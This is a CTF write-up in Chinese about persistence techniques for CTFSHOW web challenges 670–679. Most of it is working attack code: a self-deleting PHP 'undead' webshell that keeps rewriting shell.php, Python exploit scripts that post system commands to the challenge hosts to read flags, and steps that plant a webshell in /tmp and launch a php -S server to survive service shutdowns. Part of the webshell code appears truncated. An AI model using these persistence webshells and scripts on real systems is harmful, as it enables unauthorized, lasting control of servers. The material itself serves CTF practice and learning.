CTFSHOW权限维持篇

文章目录

    • web670-web676
    • web677、web678
    • web679

web670-web676

题目在进行check后,会删掉网站根目录下的所有文件。
方法一
预测是使用的如下命令

echo 'flag{xxxx}' > /flag_xx.txt
rm -rf *

rm -rf *其实有个小缺陷,无法删除点号开头的文件,所以可以利用给的木马生成一个.shell.php的木马,check后还会保留。

方法二
使用反弹shell
不过题目是不出网的,所以这种方法暂时无法考虑。

方法三
可以使用不死马将木马写入内存。


    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = 'shell.php';
    $code = '';
    while (1) {
        file_put_contents($file, $code);
        usleep(5000);
    }
?>
 

访问该不死马后,触发check,接着蚁剑连接shell.php即可拿到flag。
一键利用脚本

import requests
url="http://6143fdfc-94e3-4698-824f-f5da79a33081.challenge.ctf.show/"
data1={'cmd':"file_put_contents('a.php',\"';while (1) {file_put_contents(\\$file, \\$code);usleep(5000);}?>\");"}
r=requests.post(url+'?action=cmd',data=data1)
try:
	requests.get(url+'a.php',timeout=(1,1))
except:
	requests.get(url+'?action=check')
	r=requests.post(url+'shell.php',data={'1':'system("cat /f*");'})
	print(r.text)

web677、web678

和前面有点不同,没有写入权限(除了/tmp目录)
猜测check是先生成flag接着删掉了所有/var/www/html下的文件。
所以我们可以通过while循环持续的打开flag,当check时,页面上就会出现flag。
payload
cmd=system('while true;do cat /tmp/f*;done');

web679

check后会关闭nginx php-fpm等服务,不过我们可以利用php命令直接开启一个服务
php -S 0.0.0.0:80,哪个目录下运行该命令,哪个目录就被当作根目录。
有点类似于python开启web服务
python -m SimpleHTTPServer 80
大致流程如下:
1、/tmp目录可写,在该目录下生成木马文件
cmd=system('cd /tmp;echo "" > index.php');
2、开启web服务
cmd=system('cd /tmp;php -S 0.0.0.0:80');
3、触发check
4、利用木马
但在实际使用中会发现,手动开启的web服务check后也会被停掉。
所以需要保证check后再开启web服务,也就是加个延时。

import requests
url="http://b370b8d4-cdca-40dd-a3eb-6d6d4485965a.challenge.ctf.show/"

data1={'cmd':"system('cd /tmp;echo \"\" > index.php');"}
r=requests.post(url+'?action=cmd',data=data1)


data2={'cmd':"system('sleep 3;cd /tmp;php -S 0.0.0.0:80');"}
try:
	requests.post(url+'?action=cmd',data=data2,timeout=(1,1))
except:
	requests.get(url+'?action=check')
	while True:
		r=requests.post(url,data={'1':'system("cat /f*");'})
		if "ctfshow{" in r.text:
			print(r.text)
			break

你可能感兴趣的:(CTFSHOW,web入门系列,php,开发语言)